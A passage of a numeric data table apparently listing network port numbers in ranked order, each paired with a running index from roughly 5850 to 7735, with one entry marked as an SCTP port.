9445 5850 | 2180 5851 | 3180 5852 | 2621 5853 | 4551 5854 | 3008 5855 | 7013 5856 | 7014 5857 | 5362 5858 | 6601 5859 | 1512 5860 | 5356 5861 | 6074 5862 | 5726 5863 | 5364 5864 | 5725 5865 | 6076 5866 | 6075 5867 | 2175 5868 | 3132 5869 | 5359 5870 | 2176 5871 | 5022 5872 | 4679 5873 | 4680 5874 | 6509 5875 | 2266 5876 | 6382 5877 | 2230 5878 | 6390 5879 | 6370 5880 | 6360 5881 | 393 5882 | 2311 5883 | 8787 5884 | 18 5885 | 8786 5886 | 47000 5887 | 19788 5888 | 1960 5889 | 9596 5890 | 4603 5891 | 4151 5892 | 4552 5893 | 11211 5894 | 3569 5895 | 4883 5896 | 3571 5897 | 2944 5898 | 2945 5899 | 2272 5900 | 7720 5901 | 5157 5902 | 3445 5903 | 2427 5904 | 2727 5905 | 2363 5906 | 46999 5907 | 2789 5908 | 13930 5909 | 3232 5910 | 2688 5911 | 3235 5912 | 5598 5913 | 3115 5914 | 3117 5915 | 3116 5916 | 3331 5917 | 3332 5918 | 3302 5919 | 3330 5920 | 3558 5921 | 3570 5922 | 4153 5923 | 2591 5924 | 4179 5925 | 4171 5926 | 3276 5927 | 4360 5928 | 4458 5929 | 7421 5930 | 49000 5931 | 7073 5932 | 3836 5933 | 5282 5934 | 8384 5935 | 36700 5936 | 4686 5937 | 269 5938 | 9255 5939 | 6201 5940 | 2544 5941 | 2516 5942 | 2864 5943 | 5092 5944 | 2243 5945 | 4902 5946 | 313 5947 | 3691 5948 | 2453 5949 | 4345 5950 | 44900 5951 | 36444 5952 | 3565 5953 | 36443 5954 | 4894 5955 | 3747 5956 | 3746 5957 | 5044 5958 | 6471 5959 | 3079 5960 | 4913 5961 | 4741 5962 | 10805 5963 | 3068 5964 | 8162 5965 | 4083 5966 | 4082 5967 | 4081 5968 | 1983 5969 | 2289 5970 | 1629 5971 | 1628 5972 | 1634 5973 | 8101 5974 | 6482 5975 | 5254 5976 | 5058 5977 | 4044 5978 | 3591 5979 | 3592 5980 | 1903 5981 | 5062 5982 | 6087 5983 | 2090 5984 | 2465 5985 | 2466 5986 | 6200 5987 | 8208 5988 | 8207 5989 | 8204 5990 | 31620 5991 | 8205 5992 | 8206 5993 | 3278 5994 | 2145 5995 | 2143 5996 | 2147 5997 | 2146 5998 | 3767 5999 | 46336 6000 | 10933 6001 | 4341 6002 | 1969 6003 | 10809 6004 | 12300 6005 | 8191 6006 | 517 6007 | 4670 6008 | 7365 6009 | 3028 6010 | 3027 6011 | 3029 6012 | 1203 6013 | 1886 6014 | 11430 6015 | 374 6016 | 2212 6017 | 3407 6018 | 2816 6019 | 2779 6020 | 2815 6021 | 2780 6022 | 3373 6023 | 3739 6024 | 3815 6025 | 4347 6026 | 11796 6027 | 3970 6028 | 4547 6029 | 1764 6030 | 2395 6031 | 4372 6032 | 4432 6033 | 9747 6034 | 4371 6035 | 3360 6036 | 3361 6037 | 4331 6038 | 40023 6039 | 27504 6040 | 2294 6041 | 5253 6042 | 7697 6043 | 35354 6044 | 186 6045 | 30260 6046 | 4566 6047 | 584 6048 | 5696 6049 | 6623 6050 | 6620 6051 | 6621 6052 | 2502 6053 | 3112 6054 | 36865 6055 | 2918 6056 | 4661 6057 | 31016 6058 | 26262 6059 | 26263 6060 | 3642 6061 | 5309 6062 | 3155 6063 | 4166 6064 | 27442 6065 | 6583 6066 | 3215 6067 | 3214 6068 | 8901 6069 | 19020 6070 | 4160 6071 | 3094 6072 | 3093 6073 | 3777 6074 | 1937 6075 | 1938 6076 | 1939 6077 | 1940 6078 | 2097 6079 | 1936 6080 | 1810 6081 | 6244 6082 | 6243 6083 | 6242 6084 | 6241 6085 | 4107 6086 | 19541 6087 | 3529 6088 | 3528 6089 | 5230 6090 | 4327 6091 | 5883 6092 | 2205 6093 | 7095 6094 | 3794 6095 | 3473 6096 | 3472 6097 | 7181 6098 | 5034 6099 | 3627 6100 | 8091 6101 | 1578 6102 | 5673 6103 | 5049 6104 | 4880 6105 | 3258 6106 | 2828 6107 | 3719 6108 | 7478 6109 | 7280 6110 | 1636 6111 | 1637 6112 | 3775 6113 | 24321 6114 | 499 6115 | 3205 6116 | 1950 6117 | 1949 6118 | 3226 6119 | 8148 6120 | 5047 6121 | 4075 6122 | 17223 6123 | 21000 6124 | 3504 6125 | 3206 6126 | 2632 6127 | 529 6128 | 4073 6129 | 32034 6130 | 18769 6131 | 2527 6132 | 4593 6133 | 4791 6134 | 7031 6135 | 33435 6136 | 4740 6137 | 4739 6138 | 4068 6139 | 20202 6140 | 4737 6141 | 9214 6142 | 2215 6143 | 3743 6144 | 2088 6145 | 7410 6146 | 5728 6147 | 45054 6148 | 3614 6149 | 8020 6150 | 11751 6151 | 2202 6152 | 6697 6153 | 4744 6154 | 1884 6155 | 3699 6156 | 6714 6157 | 1611 6158 | 7202 6159 | 4569 6160 | 3508 6161 | 24386 6162 | 16995 6163 | 16994 6164 | 1674 6165 | 1673 6166 | 7128 6167 | 4746 6168 | 17234 6169 | 9215 6170 | 4486 6171 | 484 6172 | 5057 6173 | 5056 6174 | 7624 6175 | 2980 6176 | 4109 6177 | 49150 6178 | 215 6179 | 23005 6180 | 23004 6181 | 23003 6182 | 23002 6183 | 23001 6184 | 23000 6185 | 2716 6186 | 3560 6187 | 5597 6188 | 134 6189 | 38001 6190 | 38000 6191 | 4067 6192 | 1428 6193 | 2480 6194 | 5029 6195 | 8067 6196 | 5069 6197 | 3156 6198 | 3139 6199 | 244 6200 | 7675 6201 | 7673 6202 | 7672 6203 | 7674 6204 | 2637 6205 | 4139 6206 | 3783 6207 | 3657 6208 | 11320 6209 | 8615 6210 | 585 6211 | 48128 6212 | 2239 6213 | 3596 6214 | 2055 6215 | 3186 6216 | 19000 6217 | 5165 6218 | 3420 6219 | 17220 6220 | 17221 6221 | 19998 6222 | 2404 6223 | 2079 6224 | 4152 6225 | 4604 6226 | 25604 6227 | 5742 6228 | 5741 6229 | 4553 6230 | 2799 6231 | 4801 6232 | 4802 6233 | 2063 6234 | 14143 6235 | 14142 6236 | 4061 6237 | 4062 6238 | 4063 6239 | 4064 6240 | 31948 6241 | 31949 6242 | 2276 6243 | 2275 6244 | 1881 6245 | 2078 6246 | 3660 6247 | 3661 6248 | 1920 6249 | 1919 6250 | 9085 6251 | 424 6252 | 1933 6253 | 1934 6254 | 9089 6255 | 9088 6256 | 3667 6257 | 3666 6258 | 12003 6259 | 12004 6260 | 3539 6261 | 3538 6262 | 3267 6263 | 385 6264 | 3494 6265 | 4594 6266 | 4595 6267 | 4596 6268 | 3898 6269 | 9614 6270 | 4169 6271 | 5674 6272 | 2374 6273 | 5105 6274 | 8313 6275 | 44323 6276 | 5628 6277 | 2570 6278 | 2113 6279 | 4591 6280 | 4592 6281 | 5228 6282 | 5224 6283 | 5227 6284 | 2207 6285 | 4484 6286 | 3037 6287 | 2209 6288 | 2448 6289 | 3101 6290 | 382 6291 | 381 6292 | 3209 6293 | 7510 6294 | 2206 6295 | 2690 6296 | 2208 6297 | 7738 6298 | 5565 6299 | 5317 6300 | 3329 6301 | 3612 6302 | 5316 6303 | 3449 6304 | 2029 6305 | 1985 6306 | 10125 6307 | 2597 6308 | 3634 6309 | 3250 6310 | 4884 6311 | 4117 6312 | 2467 6313 | 4148 6314 | 7397 6315 | 22370 6316 | 3921 6317 | 4306 6318 | 10860 6319 | 3740 6320 | 1161 6321 | 2641 6322 | 7630 6323 | 3804 6324 | 4197 6325 | 11108 6326 | 9954 6327 | 6791 6328 | 3623 6329 | 3769 6330 | 3036 6331 | 5315 6332 | 5305 6333 | 3542 6334 | 5304 6335 | 11720 6336 | 2517 6337 | 3179 6338 | 2979 6339 | 2356 6340 | 3745 6341 | 18262 6342 | 2186 6343 | 35356 6344 | 3436 6345 | 2152 6346 | 2123 6347 | 1452 6348 | 4729 6349 | 3761 6350 | 3136 6351 | 30400 6352 | 6267 6353 | 6269 6354 | 6268 6355 | 3757 6356 | 4026 6357 | 5117 6358 | 9277 6359 | 2947 6360 | 3386 6361 | 2217 6362 | 37483 6363 | 16002 6364 | 5687 6365 | 2072 6366 | 1909 6367 | 9122 6368 | 9123 6369 | 4131 6370 | 3912 6371 | 3229 6372 | 1880 6373 | 5688 6374 | 10800 6375 | 4985 6376 | 3108 6377 | 3475 6378 | 6080 6379 | 4790 6380 | 23053 6381 | 6081 6382 | 8190 6383 | 7017 6384 | 7283 6385 | 4730 6386 | 2159 6387 | 3429 6388 | 2660 6389 | 14145 6390 | 3484 6391 | 3762 6392 | 3222 6393 | 8322 6394 | 1421 6395 | 1859 6396 | 31765 6397 | 2914 6398 | 3051 6399 | 38201 6400 | 8881 6401 | 4340 6402 | 8074 6403 | 2678 6404 | 2677 6405 | 4110 6406 | 2731 6407 | 286 6408 | 3402 6409 | 3272 6410 | 1514 6411 | 3382 6412 | 1904 6413 | 1902 6414 | 3648 6415 | 2975 6416 | 574 6417 | 8502 6418 | 3488 6419 | 9217 6420 | 4130 6421 | 7726 6422 | 5556 6423 | 7244 6424 | 41111 6425 | 4411 6426 | 4084 6427 | 2242 6428 | 4396 6429 | 4901 6430 | 7545 6431 | 7544 6432 | 27008 6433 | 27006 6434 | 27004 6435 | 5579 6436 | 2884 6437 | 3035 6438 | 1193 6439 | 5618 6440 | 7018 6441 | 2673 6442 | 4086 6443 | 8043 6444 | 8044 6445 | 3192 6446 | 3729 6447 | 1855 6448 | 1856 6449 | 1784 6450 | 24922 6451 | 1887 6452 | 7164 6453 | 4349 6454 | 7394 6455 | 16021 6456 | 16020 6457 | 6715 6458 | 4915 6459 | 4122 6460 | 3216 6461 | 14250 6462 | 3152 6463 | 1776 6464 | 36524 6465 | 4320 6466 | 4727 6467 | 3225 6468 | 2819 6469 | 4038 6470 | 6417 6471 | 347 6472 | 3047 6473 | 2495 6474 | 10081 6475 | 38202 6476 | 2515 6477 | 2514 6478 | 4353 6479 | 38472 6480 | 10102 6481 | 4085 6482 | 3953 6483 | 4788 6484 | 3088 6485 | 3134 6486 | 3639 6487 | 4309 6488 | 2755 6489 | 1928 6490 | 5075 6491 | 5401 6492 | 3759 6493 | 43440 6494 | 1926 6495 | 1982 6496 | 1798 6497 | 9981 6498 | 4536 6499 | 4535 6500 | 1504 6501 | 592 6502 | 1267 6503 | 6935 6504 | 2036 6505 | 6316 6506 | 2221 6507 | 44818 6508 | 34980 6509 | 2380 6510 | 2379 6511 | 6107 6512 | 1772 6513 | 8416 6514 | 8417 6515 | 4023 6516 | 3629 6517 | 9617 6518 | 3679 6519 | 3727 6520 | 4942 6521 | 4941 6522 | 4940 6523 | 43439 6524 | 3628 6525 | 3620 6526 | 5116 6527 | 3259 6528 | 4666 6529 | 4669 6530 | 3819 6531 | 37601 6532 | 5084 6533 | 5085 6534 | 3383 6535 | 5599 6536 | 5600 6537 | 5601 6538 | 3665 6539 | 1818 6540 | 3044 6541 | 1295 6542 | 7962 6543 | 7117 6544 | 121 6545 | 17754 6546 | 20480 6547 | 23333 6548 | 3585 6549 | 6322 6550 | 6321 6551 | 4091 6552 | 4092 6553 | 140 6554 | 6656 6555 | 3693 6556 | 11623 6557 | 11723 6558 | 3682 6559 | 3218 6560 | 9083 6561 | 3197 6562 | 3198 6563 | 394 6564 | 2526 6565 | 7700 6566 | 7707 6567 | 2916 6568 | 2917 6569 | 4370 6570 | 6515 6571 | 12010 6572 | 5398 6573 | 3564 6574 | 4346 6575 | 1378 6576 | 1893 6577 | 3525 6578 | 3638 6579 | 2228 6580 | 6632 6581 | 3392 6582 | 3671 6583 | 6159 6584 | 3462 6585 | 3461 6586 | 3464 6587 | 3465 6588 | 3460 6589 | 3463 6590 | 3123 6591 | 34567 6592 | 8149 6593 | 6703 6594 | 6702 6595 | 2263 6596 | 3477 6597 | 3524 6598 | 6160 6599 | 17729 6600 | 3711 6601 | 45678 6602 | 2168 6603 | 3328 6604 | 3932 6605 | 3295 6606 | 2164 6607 | 3395 6608 | 2874 6609 | 3246 6610 | 3247 6611 | 4191 6612 | 4028 6613 | 3489 6614 | 4556 6615 | 5684 6616 | 13929 6617 | 31685 6618 | 9987 6619 | 4060 6620 | 13819 6621 | 13820 6622 | 13821 6623 | 13818 6624 | 13822 6625 | 2420 6626 | 7547 6627 | 3685 6628 | 2193 6629 | 4427 6630 | 1930 6631 | 8913 6632 | 7021 6633 | 7020 6634 | 5719 6635 | 5245 6636 | 6326 6637 | 6320 6638 | 6325 6639 | 3522 6640 | 44544 6641 | 13400 6642 | 6088 6643 | 3568 6644 | 8567 6645 | 3567 6646 | 5567 6647 | 7165 6648 | 4142 6649 | 3161 6650 | 5352 6651 | 195 6652 | 1172 6653 | 5993 6654 | 3199 6655 | 3574 6656 | 4059 6657 | 1177 6658 | 3624 6659 | 19999 6660 | 21212 6661 | 246 6662 | 5107 6663 | 14002 6664 | 7171 6665 | 3448 6666 | 3336 6667 | 3335 6668 | 3337 6669 | 198 6670 | 197 6671 | 3447 6672 | 5031 6673 | 4605 6674 | 2464 6675 | 2227 6676 | 3223 6677 | 1335 6678 | 2226 6679 | 33333 6680 | 2762 6681 | 2761 6682 | 3227 6683 | 3228 6684 | 33331 6685 | 2861 6686 | 2860 6687 | 2098 6688 | 4301 6689 | 3252 6690 | 547 6691 | 546 6692 | 6785 6693 | 8750 6694 | 4330 6695 | 3776 6696 | 24850 6697 | 8805 6698 | 2763 6699 | 4167 6700 | 2092 6701 | 3444 6702 | 8415 6703 | 3714 6704 | 1278 6705 | 5700 6706 | 3668 6707 | 7569 6708 | 365 6709 | 11202 6710 | 3988 6711 | 1160 6712 | 3938 6713 | 6117 6714 | 6624 6715 | 6625 6716 | 2073 6717 | 461 6718 | 3578 6719 | 11109 6720 | 2229 6721 | 1775 6722 | 2764 6723 | 3678 6724 | 1133 6725 | 29999 6726 | 2594 6727 | 3881 6728 | 3498 6729 | 8732 6730 | 5777 6731 | 3394 6732 | 3393 6733 | 2298 6734 | 2297 6735 | 9388 6736 | 9387 6737 | 3120 6738 | 3297 6739 | 1898 6740 | 8442 6741 | 9888 6742 | 4183 6743 | 4673 6744 | 3778 6745 | 5271 6746 | 3127 6747 | 1932 6748 | 4451 6749 | 2563 6750 | 4452 6751 | 9346 6752 | 7022 6753 | 3631 6754 | 3630 6755 | 105 6756 | 3271 6757 | 2699 6758 | 3004 6759 | 2129 6760 | 4187 6761 | 3113 6762 | 2314 6763 | 8380 6764 | 8377 6765 | 8376 6766 | 8379 6767 | 8378 6768 | 3818 6769 | 41797 6770 | 41796 6771 | 38002 6772 | 3364 6773 | 3366 6774 | 2824 6775 | 2823 6776 | 3609 6777 | 4055 6778 | 4054 6779 | 4053 6780 | 2654 6781 | 19220 6782 | 9093 6783 | 3183 6784 | 2565 6785 | 4078 6786 | 4774 6787 | 2153 6788 | 17222 6789 | 7551 6790 | 7563 6791 | 3072 6792 | 4047 6793 | 9695 6794 | 4846 6795 | 5992 6796 | 5683 6797 | 4692 6798 | 3191 6799 | 3417 6800 | 7169 6801 | 3973 6802 | 46998 6803 | 16384 6804 | 3947 6805 | 47100 6806 | 6970 6807 | 2491 6808 | 7023 6809 | 10321 6810 | 42508 6811 | 3822 6812 | 2417 6813 | 2555 6814 | 3257 6815 | 3256 6816 | 22343 6817 | 64 6818 | 7215 6819 | 20003 6820 | 4450 6821 | 3751 6822 | 3605 6823 | 2534 6824 | 3490 6825 | 4419 6826 | 7689 6827 | 7574 6828 | 3377 6829 | 3779 6830 | 44444 6831 | 3039 6832 | 2415 6833 | 2183 6834 | 26257 6835 | 3576 6836 | 3575 6837 | 2976 6838 | 7168 6839 | 8501 6840 | 164 6841 | 3384 6842 | 7550 6843 | 45514 6844 | 356 6845 | 2617 6846 | 3730 6847 | 6688 6848 | 6687 6849 | 6690 6850 | 7683 6851 | 2052 6852 | 3481 6853 | 4136 6854 | 4137 6855 | 9087 6856 | 172 6857 | 1729 6858 | 4980 6859 | 7229 6860 | 7228 6861 | 24754 6862 | 2897 6863 | 7279 6864 | 2512 6865 | 2513 6866 | 4870 6867 | 22305 6868 | 5787 6869 | 6633 6870 | 131 6871 | 15555 6872 | 4051 6873 | 4785 6874 | 43441 6875 | 5784 6876 | 7546 6877 | 3887 6878 | 5194 6879 | 1743 6880 | 2891 6881 | 3770 6882 | 1377 6883 | 4316 6884 | 4314 6885 | 3099 6886 | 1572 6887 | 1891 6888 | 1892 6889 | 3349 6890 | 18241 6891 | 18243 6892 | 18242 6893 | 18185 6894 | 5505 6895 | 562 6896 | 531 6897 | 3772 6898 | 5065 6899 | 5064 6900 | 2182 6901 | 3893 6902 | 2921 6903 | 2922 6904 | 4074 6905 | 4140 6906 | 4115 6907 | 3056 6908 | 3616 6909 | 3559 6910 | 4970 6911 | 4969 6912 | 3114 6913 | 3157 6914 | 3750 6915 | 12168 6916 | 2122 6917 | 7129 6918 | 7162 6919 | 7167 6920 | 5270 6921 | 1197 6922 | 9060 6923 | 3106 6924 | 5247 6925 | 5246 6926 | 3290 6927 | 4728 6928 | 8998 6929 | 8610 6930 | 8609 6931 | 3756 6932 | 8614 6933 | 8613 6934 | 8612 6935 | 8611 6936 | 1872 6937 | 3583 6938 | 24676 6939 | 4377 6940 | 5079 6941 | 4378 6942 | 1734 6943 | 3545 6944 | 7262 6945 | 3675 6946 | 2552 6947 | 22537 6948 | 3709 6949 | 14414 6950 | 5251 6951 | 1882 6952 | 42509 6953 | 2318 6954 | 4326 6955 | 1563 6956 | 7163 6957 | 1554 6958 | 7161 6959 | 595 6960 | 348 6961 | 282 6962 | 8026 6963 | 5249 6964 | 5248 6965 | 5154 6966 | 10880 6967 | 3626 6968 | 4990 6969 | 3107 6970 | 6410 6971 | 6409 6972 | 6408 6973 | 6407 6974 | 6406 6975 | 6405 6976 | 6404 6977 | 4677 6978 | 581 6979 | 4671 6980 | 2964 6981 | 2965 6982 | 28589 6983 | 47808 6984 | 3966 6985 | 2446 6986 | 1854 6987 | 1961 6988 | 2444 6989 | 2277 6990 | 4175 6991 | 3188 6992 | 3043 6993 | 9380 6994 | 3692 6995 | 5682 6996 | 2155 6997 | 4104 6998 | 4103 6999 | 4102 7000 | 3593 7001 | 2845 7002 | 2844 7003 | 4186 7004 | 2218 7005 | 4678 7006 | 2017 7007 | 2913 7008 | 7648 7009 | 4914 7010 | 7687 7011 | 6501 7012 | 9750 7013 | 3344 7014 | 1896 7015 | 4568 7016 | 10128 7017 | 6768 7018 | 6767 7019 | 3182 7020 | 1313 7021 | 3181 7022 | 2059 7023 | 3604 7024 | 6300 7025 | 10129 7026 | 3695 7027 | 6301 7028 | 2494 7029 | 2625 7030 | 48129 7031 | 8195 7032 | 2574 7033 | 5750 7034 | 13823 7035 | 13216 7036 | 4027 7037 | 5068 7038 | 25955 7039 | 25954 7040 | 6946 7041 | 3411 7042 | 24577 7043 | 5429 7044 | 4621 7045 | 6784 7046 | 4676 7047 | 4675 7048 | 4784 7049 | 3785 7050 | 5425 7051 | 5424 7052 | 4305 7053 | 3960 7054 | 3408 7055 | 5584 7056 | 5585 7057 | 1943 7058 | 3124 7059 | 6508 7060 | 6507 7061 | 4155 7062 | 1120 7063 | 1929 7064 | 4324 7065 | 10439 7066 | 6506 7067 | 6505 7068 | 6122 7069 | 4971 7070 | 3387 7071 | 152 7072 | 2635 7073 | 2169 7074 | 6696 7075 | 2204 7076 | 3512 7077 | 2071 7078 | 10260 7079 | 35100 7080 | 3277 7081 | 3502 7082 | 2066 7083 | 2238 7084 | 4413 7085 | 20057 7086 | 2992 7087 | 2050 7088 | 3965 7089 | 10990 7090 | 31020 7091 | 4685 7092 | 1140 7093 | 7508 7094 | 16003 7095 | 5913 7096 | 4071 7097 | 3104 7098 | 3437 7099 | 5067 7100 | 33123 7101 | 1146 7102 | 44600 7103 | 2264 7104 | 7543 7105 | 2419 7106 | 32896 7107 | 2317 7108 | 3821 7109 | 4937 7110 | 1520 7111 | 11367 7112 | 4154 7113 | 3617 7114 | 20999 7115 | 1170 7116 | 1171 7117 | 27876 7118 | 4485 7119 | 4704 7120 | 7235 7121 | 3087 7122 | 45000 7123 | 4405 7124 | 4404 7125 | 4406 7126 | 4402 7127 | 4403 7128 | 4400 7129 | 5727 7130 | 11489 7131 | 2192 7132 | 4077 7133 | 4448 7134 | 3581 7135 | 5150 7136 | 13702 7137 | 3864/sctp 7138 | 3451 7139 | 386 7140 | 7166 7141 | 3518 7142 | 27782 7143 | 3176 7144 | 9292 7145 | 3174 7146 | 9295 7147 | 9294 7148 | 3426 7149 | 8423 7150 | 3140 7151 | 7570 7152 | 421 7153 | 2114 7154 | 6344 7155 | 2581 7156 | 2582 7157 | 11321 7158 | 384 7159 | 23546 7160 | 1834 7161 | 1115 7162 | 4165 7163 | 1557 7164 | 3758 7165 | 7847 7166 | 5086 7167 | 4849 7168 | 2037 7169 | 1447 7170 | 3312 7171 | 187 7172 | 4488 7173 | 2336 7174 | 387 7175 | 208 7176 | 207 7177 | 203 7178 | 3454 7179 | 10548 7180 | 4674 7181 | 38203 7182 | 3239 7183 | 3236 7184 | 3237 7185 | 3238 7186 | 4573 7187 | 2758 7188 | 10252 7189 | 2759 7190 | 8121 7191 | 2754 7192 | 8122 7193 | 3184 7194 | 539 7195 | 6082 7196 | 18888 7197 | 9952 7198 | 9951 7199 | 7846 7200 | 7845 7201 | 6549 7202 | 5456 7203 | 5455 7204 | 5454 7205 | 4851 7206 | 5072 7207 | 3939 7208 | 2247 7209 | 1206 7210 | 3715 7211 | 2646 7212 | 3054 7213 | 5671 7214 | 8040 7215 | 376 7216 | 2640 7217 | 30004 7218 | 30003 7219 | 5192 7220 | 4393 7221 | 4392 7222 | 4391 7223 | 4394 7224 | 1931 7225 | 5506 7226 | 8301 7227 | 4563 7228 | 35355 7229 | 4011 7230 | 7799 7231 | 3265 7232 | 9209 7233 | 693 7234 | 36001 7235 | 9956 7236 | 9955 7237 | 6627 7238 | 3234 7239 | 2667 7240 | 2668 7241 | 3613 7242 | 4804 7243 | 2887 7244 | 3416 7245 | 3833 7246 | 9216 7247 | 2846 7248 | 17555 7249 | 2786 7250 | 3316 7251 | 3021 7252 | 3026 7253 | 4878 7254 | 3917 7255 | 4362 7256 | 7775 7257 | 3224 7258 | 23457 7259 | 23456 7260 | 4549 7261 | 4431 7262 | 2295 7263 | 3573 7264 | 5073 7265 | 3760 7266 | 3357 7267 | 3954 7268 | 3705 7269 | 3704 7270 | 2692 7271 | 6769 7272 | 7170 7273 | 2521 7274 | 2085 7275 | 3096 7276 | 2810 7277 | 2859 7278 | 3431 7279 | 9389 7280 | 3655 7281 | 5106 7282 | 5103 7283 | 7509 7284 | 6801 7285 | 4013 7286 | 5540 7287 | 2476 7288 | 2475 7289 | 2334 7290 | 12007 7291 | 12008 7292 | 6868 7293 | 4046 7294 | 18463 7295 | 32483 7296 | 4030 7297 | 8793 7298 | 2259 7299 | 62 7300 | 1955 7301 | 3781 7302 | 3619 7303 | 3618 7304 | 28119 7305 | 4726 7306 | 4502 7307 | 4597 7308 | 4598 7309 | 3598 7310 | 3597 7311 | 3125 7312 | 4149 7313 | 9953 7314 | 23294 7315 | 2933 7316 | 2934 7317 | 5783 7318 | 5782 7319 | 5785 7320 | 5781 7321 | 15363 7322 | 48049 7323 | 2339 7324 | 5265 7325 | 5264 7326 | 1181 7327 | 3446 7328 | 3428 7329 | 15998 7330 | 3091 7331 | 2133 7332 | 3774 7333 | 317 7334 | 3832 7335 | 508 7336 | 3721 7337 | 1619 7338 | 1716 7339 | 2279 7340 | 3412 7341 | 2327 7342 | 6558 7343 | 2130 7344 | 1760 7345 | 5413 7346 | 2396 7347 | 2923 7348 | 3378 7349 | 3466 7350 | 2504 7351 | 2720 7352 | 4871 7353 | 7395 7354 | 3926 7355 | 1727 7356 | 1326 7357 | 2518 7358 | 1890 7359 | 2781 7360 | 565 7361 | 4984 7362 | 3342 7363 | 21845 7364 | 1963 7365 | 2851 7366 | 3748 7367 | 1739 7368 | 1269 7369 | 2455 7370 | 2547 7371 | 2548 7372 | 2546 7373 | 13882 7374 | 7779 7375 | 2695 7376 | 312 7377 | 2996 7378 | 2893 7379 | 1589 7380 | 2649 7381 | 1224 7382 | 1345 7383 | 3625 7384 | 2538 7385 | 3321 7386 | 175 7387 | 1868 7388 | 4344 7389 | 1853 7390 | 3058 7391 | 3802 7392 | 78 7393 | 2770 7394 | 3270 7395 | 575 7396 | 1771 7397 | 4839 7398 | 4838 7399 | 4837 7400 | 671 7401 | 430 7402 | 431 7403 | 2745 7404 | 2648 7405 | 3356 7406 | 1957 7407 | 2820 7408 | 1978 7409 | 2927 7410 | 2499 7411 | 2437 7412 | 2138 7413 | 2110 7414 | 1797 7415 | 1737 7416 | 483 7417 | 390 7418 | 1867 7419 | 2879 7420 | 2767 7421 | 2768 7422 | 2943 7423 | 1568 7424 | 2489 7425 | 1237 7426 | 2741 7427 | 2742 7428 | 8804 7429 | 1588 7430 | 6069 7431 | 1869 7432 | 2642 7433 | 20670 7434 | 594 7435 | 2885 7436 | 2669 7437 | 476 7438 | 2798 7439 | 3083 7440 | 3082 7441 | 3081 7442 | 2361 7443 | 5104 7444 | 1758 7445 | 7491 7446 | 1728 7447 | 5428 7448 | 1946 7449 | 559 7450 | 1610 7451 | 3144 7452 | 1922 7453 | 2726 7454 | 6149 7455 | 1838 7456 | 4014 7457 | 1274 7458 | 2647 7459 | 4106 7460 | 6102 7461 | 4548 7462 | 19540 7463 | 1866 7464 | 6965 7465 | 6966 7466 | 6964 7467 | 6963 7468 | 1751 7469 | 1625 7470 | 5453 7471 | 2709 7472 | 7967 7473 | 3354 7474 | 566 7475 | 4178 7476 | 2986 7477 | 1226 7478 | 1836 7479 | 1654 7480 | 2838 7481 | 1692 7482 | 3644 7483 | 6071 7484 | 477 7485 | 478 7486 | 2507 7487 | 1923 7488 | 3193 7489 | 2653 7490 | 2636 7491 | 1621 7492 | 3379 7493 | 2533 7494 | 2892 7495 | 2452 7496 | 1684 7497 | 2333 7498 | 22000 7499 | 1553 7500 | 3536 7501 | 11201 7502 | 2775 7503 | 2942 7504 | 2941 7505 | 2940 7506 | 2939 7507 | 2938 7508 | 2613 7509 | 426 7510 | 4116 7511 | 4412 7512 | 1966 7513 | 3065 7514 | 1225 7515 | 1705 7516 | 1618 7517 | 1660 7518 | 2545 7519 | 2676 7520 | 3687 7521 | 2756 7522 | 1599 7523 | 2832 7524 | 2831 7525 | 2830 7526 | 2829 7527 | 5461 7528 | 2974 7529 | 498 7530 | 1626 7531 | 3595 7532 | 160 7533 | 153 7534 | 3326 7535 | 1714 7536 | 3172 7537 | 3173 7538 | 3171 7539 | 3170 7540 | 3169 7541 | 2235 7542 | 6108 7543 | 169 7544 | 5399 7545 | 2471 7546 | 558 7547 | 2308 7548 | 1681 7549 | 2385 7550 | 3562 7551 | 5024 7552 | 5025 7553 | 5427 7554 | 3391 7555 | 3744 7556 | 1646 7557 | 3275 7558 | 3698 7559 | 2390 7560 | 1793 7561 | 1647 7562 | 1697 7563 | 1693 7564 | 1695 7565 | 1696 7566 | 2919 7567 | 9599 7568 | 2423 7569 | 3844 7570 | 2959 7571 | 2818 7572 | 1817 7573 | 521 7574 | 3147 7575 | 3163 7576 | 2886 7577 | 283 7578 | 2837 7579 | 2543 7580 | 2928 7581 | 2240 7582 | 1343 7583 | 2321 7584 | 3467 7585 | 9753 7586 | 1530 7587 | 2872 7588 | 1595 7589 | 2900 7590 | 1341 7591 | 2935 7592 | 3059 7593 | 2724 7594 | 3385 7595 | 2765 7596 | 368 7597 | 2461 7598 | 2462 7599 | 1253 7600 | 2680 7601 | 3009 7602 | 2434 7603 | 2694 7604 | 2351 7605 | 2353 7606 | 2354 7607 | 1788 7608 | 2352 7609 | 3662 7610 | 2355 7611 | 2091 7612 | 1732 7613 | 8183 7614 | 1678 7615 | 2588 7616 | 2924 7617 | 2687 7618 | 5071 7619 | 1777 7620 | 2899 7621 | 494 7622 | 3875 7623 | 2937 7624 | 5437 7625 | 5436 7626 | 3469 7627 | 3285 7628 | 1293 7629 | 5272 7630 | 2865 7631 | 321 7632 | 1280 7633 | 1779 7634 | 6432 7635 | 1230 7636 | 2843 7637 | 3033 7638 | 2566 7639 | 1562 7640 | 3085 7641 | 3892 7642 | 1246 7643 | 1564 7644 | 8160 7645 | 1633 7646 | 9997 7647 | 9996 7648 | 7511 7649 | 5236 7650 | 3955 7651 | 2956 7652 | 2954 7653 | 2953 7654 | 5310 7655 | 2951 7656 | 2936 7657 | 6951 7658 | 2413 7659 | 2407 7660 | 1597 7661 | 1570 7662 | 2398 7663 | 1809 7664 | 1575 7665 | 1754 7666 | 1748 7667 | 22001 7668 | 3855 7669 | 2368 7670 | 8764 7671 | 6653 7672 | 5314 7673 | 2267 7674 | 3244 7675 | 2661 7676 | 2364 7677 | 506 7678 | 2322 7679 | 2498 7680 | 3305 7681 | 183 7682 | 650 7683 | 2329 7684 | 5991 7685 | 1463 7686 | 159 7687 | 8450 7688 | 1917 7689 | 1921 7690 | 2839 7691 | 2503 7692 | 25903 7693 | 25901 7694 | 25902 7695 | 2556 7696 | 2672 7697 | 1690 7698 | 2360 7699 | 2671 7700 | 1669 7701 | 1665 7702 | 1286 7703 | 4138 7704 | 2592 7705 | 61441 7706 | 61439 7707 | 61440 7708 | 2983 7709 | 5465 7710 | 1843 7711 | 1842 7712 | 1841 7713 | 2061 7714 | 1329 7715 | 2451 7716 | 3701 7717 | 3066 7718 | 2442 7719 | 5771 7720 | 2450 7721 | 489 7722 | 8834 7723 | 1285 7724 | 3262 7725 | 2881 7726 | 2883 7727 | 43189 7728 | 6064 7729 | 1591 7730 | 1744 7731 | 405 7732 | 2397 7733 | 2683 7734 | 2162 7735 | 